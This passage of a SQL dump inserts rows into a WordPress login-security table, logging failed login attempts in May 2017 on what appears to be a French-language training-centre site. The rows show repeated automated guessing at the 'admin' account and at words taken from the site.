(100407, 1495910237.913862, 1, 'loginFailInvalidUsername', 'notre', 0, 2548839223, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100406, 1495909123.327774, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2548839223, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100405, 1495909121.539816, 1, 'loginFailInvalidUsername', 'outils', 0, 2548839223, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100404, 1495906448.015291, 1, 'loginFailValidUsername', 'admin', 1, 1345746571, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100403, 1495904455.260179, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3254658391, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100402, 1495902427.221073, 1, 'loginFailInvalidUsername', '{login}', 0, 529855267, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100401, 1495900481.793921, 1, 'loginFailValidUsername', 'admin', 1, 2156323210, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100400, 1495896342.980018, 1, 'loginFailInvalidUsername', '{login}', 0, 3107039490, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100399, 1495893519.749395, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100398, 1495893519.346112, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100397, 1495893519.036474, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100396, 1495893518.725527, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100395, 1495893518.416963, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100394, 1495893518.105850, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100393, 1495893517.794111, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100392, 1495893517.482794, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100391, 1495893517.173004, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100390, 1495893516.863253, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100389, 1495893516.555423, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100388, 1495893516.246384, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100387, 1495893515.936010, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100386, 1495893515.612810, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100385, 1495893515.304021, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100384, 1495893514.995434, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100383, 1495893514.686866, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100382, 1495893514.378490, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100381, 1495893514.066037, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100380, 1495892193.568709, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2949647692, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100379, 1495884375.688956, 1, 'loginFailValidUsername', 'julie', 2, 1539836981, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'),
(100378, 1495882369.826126, 1, 'loginFailValidUsername', 'admin', 1, 1835212158, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100377, 1495872233.301262, 1, 'loginFailInvalidUsername', '{login}', 0, 2156323210, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100376, 1495865942.783606, 1, 'loginFailInvalidUsername', '{login}', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100375, 1495863878.814214, 1, 'loginFailValidUsername', 'admin', 1, 3170385964, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100374, 1495863759.224147, 1, 'loginFailValidUsername', 'julie', 2, 1539836981, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'),
(100373, 1495859479.824680, 1, 'loginFailInvalidUsername', '{login}', 0, 1835212154, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100371, 1495857241.367433, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100372, 1495857241.676675, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100370, 1495857241.057824, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100369, 1495857240.746670, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100368, 1495857240.437678, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100367, 1495857240.129427, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100366, 1495857239.820632, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100365, 1495857239.509831, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100364, 1495857239.200764, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100363, 1495857238.891135, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100362, 1495857238.580597, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100361, 1495857238.265058, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100360, 1495857237.951156, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100359, 1495857237.640661, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100358, 1495857237.331723, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100357, 1495857237.022129, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100356, 1495857236.707969, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100355, 1495857236.395771, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100354, 1495857236.078681, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100353, 1495852932.961256, 1, 'loginFailInvalidUsername', '{login}', 0, 1042038966, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100352, 1495846197.428282, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3470134655, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100351, 1495841872.470910, 1, 'loginFailValidUsername', 'admin', 1, 1828725654, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100350, 1495839704.131774, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 783835753, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100349, 1495837555.488568, 1, 'loginFailInvalidUsername', '{login}', 0, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100348, 1495835388.938914, 1, 'loginFailValidUsername', 'admin', 1, 3397466494, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100347, 1495833372.807289, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1046956164, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100346, 1495831342.459474, 1, 'loginFailInvalidUsername', '{login}', 0, 2949647692, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100345, 1495829229.004134, 1, 'loginFailValidUsername', 'admin', 1, 1563679021, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100344, 1495827807.342046, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100343, 1495827807.032758, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100342, 1495827806.720130, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100341, 1495827806.409871, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100340, 1495827806.100097, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100339, 1495827805.788778, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100338, 1495827805.477898, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100337, 1495827805.168308, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100336, 1495827804.857771, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100335, 1495827804.548800, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100334, 1495827804.239368, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100333, 1495827803.928135, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100332, 1495827803.618539, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100331, 1495827803.306955, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100330, 1495827802.996128, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100329, 1495827802.686131, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100328, 1495827802.375993, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100327, 1495827802.064934, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100326, 1495827801.752327, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100325, 1495827571.731989, 1, 'loginFailValidUsername', 'julie', 2, 2030594922, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100324, 1495825048.464478, 1, 'loginFailInvalidUsername', '{login}', 0, 1495116718, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100323, 1495822995.814892, 1, 'loginFailValidUsername', 'admin', 1, 781668949, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100322, 1495818679.750147, 1, 'loginFailInvalidUsername', '{login}', 0, 3387838170, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100321, 1495816486.714127, 1, 'loginFailValidUsername', 'admin', 1, 2945407100, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100320, 1495814331.707772, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1828725649, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100319, 1495812262.171206, 1, 'loginFailInvalidUsername', '{login}', 0, 1941604657, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100318, 1495808121.064227, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100316, 1495807151.492330, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100317, 1495808121.064226, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100315, 1495807151.180026, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100314, 1495807150.868078, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100313, 1495807150.556678, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100312, 1495807150.243272, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100311, 1495807149.877088, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100310, 1495807149.567416, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100309, 1495807149.250521, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100308, 1495807148.938042, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100307, 1495807148.627150, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100306, 1495807148.314604, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100305, 1495807148.001676, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100304, 1495807147.689589, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100303, 1495807147.379959, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100302, 1495807147.069475, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100301, 1495807146.753574, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100300, 1495807146.438443, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100299, 1495807146.126963, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100298, 1495807145.806355, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100297, 1495806054.624280, 1, 'loginFailInvalidUsername', '{login}', 0, 1845364905, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100296, 1495801673.014177, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100295, 1495799547.648618, 1, 'loginFailInvalidUsername', '{login}', 0, 998235371, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100294, 1495795232.077736, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3735412901, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100293, 1495793067.854757, 1, 'loginFailInvalidUsername', '{login}', 0, 3170385964, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100292, 1495788617.050800, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1042038966, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100291, 1495784050.746217, 1, 'loginFailValidUsername', 'admin', 1, 1401863434, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100290, 1495781347.928362, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3254658598, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100289, 1495779079.096273, 1, 'loginFailInvalidUsername', '{login}', 0, 3397466494, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100288, 1495776658.723332, 1, 'loginFailValidUsername', 'admin', 1, 3107039609, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100287, 1495771606.049286, 1, 'loginFailInvalidUsername', '{login}', 0, 783839564, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(100286, 1495768984.075559, 1, 'loginFailValidUsername', 'admin', 1, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100285, 1495768502.364884, 1, 'loginFailValidUsername', 'admin', 1, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100284, 1495748307.344638, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.87.24 (KHTML, like Gecko) Chrome/56.2.7516.1244 Safari/532.16 OPR/42.1.5794.0521'),
(100283, 1495720449.377098, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.92.49 (KHTML, like Gecko) Version/5.4.9 Safari/531.84'),
(100282, 1495688389.872270, 1, 'loginFailValidUsername', 'admin', 1, 3497110456, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100281, 1495687824.927569, 1, 'loginFailInvalidUsername', 'notre', 0, 1760853483, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100280, 1495623875.847499, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1600667046, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100279, 1495587211.376664, 1, 'loginFailInvalidUsername', 'notre', 0, 3242600154, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100278, 1495586644.606421, 1, 'loginFailInvalidUsername', 'outils', 0, 3590043248, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100277, 1495586186.837136, 1, 'loginFailValidUsername', 'admin', 1, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100276, 1495585685.691431, 1, 'loginFailInvalidUsername', 'notre', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100275, 1495584571.974848, 1, 'loginFailInvalidUsername', 'outils', 0, 842969123, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100274, 1495584094.377546, 1, 'loginFailValidUsername', 'admin', 1, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100273, 1495583530.291845, 1, 'loginFailInvalidUsername', 'notre', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100272, 1495583194.834223, 1, 'loginFailInvalidUsername', 'outils', 0, 842965149, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100271, 1495582480.402686, 1, 'loginFailValidUsername', 'admin', 1, 3163163411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100270, 1495582000.072363, 1, 'loginFailInvalidUsername', 'center', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100269, 1495581997.599903, 1, 'loginFailInvalidUsername', 'namur', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100268, 1495581994.990733, 1, 'loginFailInvalidUsername', 'travail', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100267, 1495581992.674968, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100266, 1495581990.217263, 1, 'loginFailInvalidUsername', 'outils', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100265, 1495581988.043489, 1, 'loginFailInvalidUsername', 'venez', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100264, 1495581985.959511, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100263, 1495581983.505079, 1, 'loginFailInvalidUsername', 'cross', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100262, 1495581981.710126, 1, 'loginFailInvalidUsername', 'pour', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100261, 1495581979.910324, 1, 'loginFailInvalidUsername', 'notre', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
